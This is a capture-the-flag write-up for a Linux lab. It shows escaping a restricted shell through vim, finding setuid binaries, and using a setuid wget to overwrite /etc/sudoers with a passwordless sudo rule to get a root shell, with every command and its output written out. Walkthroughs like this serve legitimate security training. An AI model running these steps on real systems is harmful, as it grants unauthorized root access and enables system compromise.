The Challenge

It is very common on multi-user systems to restrict the functionality available to individual users. A common way to do this is by using a custom built restricted shell. This shell only allows access to a certain set of commands required by the user. The rest are unavailable. In this challenge, you have to breakout of the restricted shell and figure out how to become the root user! This lab, like any good linux privilege escalation adventure has a bit of everything – setuid binaries, permissions and overridable configurations. Enjoy!

Your mission is to get a root shell on the box! 

Challenge Accepted

To be honest this challenge is labelled hard but I found it wasy easier than the easy ones, I put it down to experience since I often priv. esc. through configuration issues and not exploits, I can count on two hands the times I have needed to rely on an exploit, look deep enough and you WILL find a configuration issue, honestly, truth is very few people can’t set up systems as they should be. In fact, during my time auditing I met one engineer who literally did everything right, to the point he schooled everyone on MS internals and config.

The Solution

I went straight for one of the first things I try, vim escape. Just type vim, then hit esc button then type the following…

:set shell=/bin/bash
:shell

Easy, now we are free. Time to see what is next, again turn to next thing I try, find SETUID files.

student@attackdefense:/usr/bin$ find / -perm -u=s -type f 2>/dev/null
 /usr/bin/chfn
 /usr/bin/gpasswd
 /usr/bin/passwd
 /usr/bin/newgrp
 /usr/bin/chsh
 /usr/bin/wget
 /usr/bin/sudo
 /bin/mount
 /bin/umount
 /bin/su

One should stand out right away, wget! Well we know we can select -o to write the file and since we are root that can be anywhere. So what is the plan? Easy, make sudoers file locally that allows sudo all with no password, my favourite trick, then start local http server and wget running as root to write file to /etc/sudoers.

student@attackdefense:/$ echo "student  ALL=(ALL) NOPASSWD: ALL" > /tmp/sudoers
student@attackdefense:/$ python -m SimpleHTTPServer 8080 &
student@attackdefense:/$ # We use & to background http server so we can wget in same terminal
student@attackdefense:/tmp$ wget 0.0.0.0:8080/tmp/sudoers -O /etc/sudoers
--2019-03-26 01:23:32--  http://0.0.0.0:8080/tmp/sudoers
Connecting to 0.0.0.0:8080... connected.
HTTP request sent, awaiting response... 127.0.0.1 - - [26/Mar/2019 01:23:32] "GET /tmp/sudoers HTTP/1.1" 200 -
200 OK
Length: 33 [application/octet-stream]
Saving to: '/etc/sudoers'

/etc/sudoers                                  100%[=================================================================================================>]      33  --.-KB/s    in 0s

2019-03-26 01:23:32 (9.81 MB/s) - '/etc/sudoers' saved [33/33]

Now for the final act…

student@attackdefense:/tmp$ sudo /bin/bash
root@attackdefense:/tmp# id
uid=0(root) gid=0(root) groups=0(root)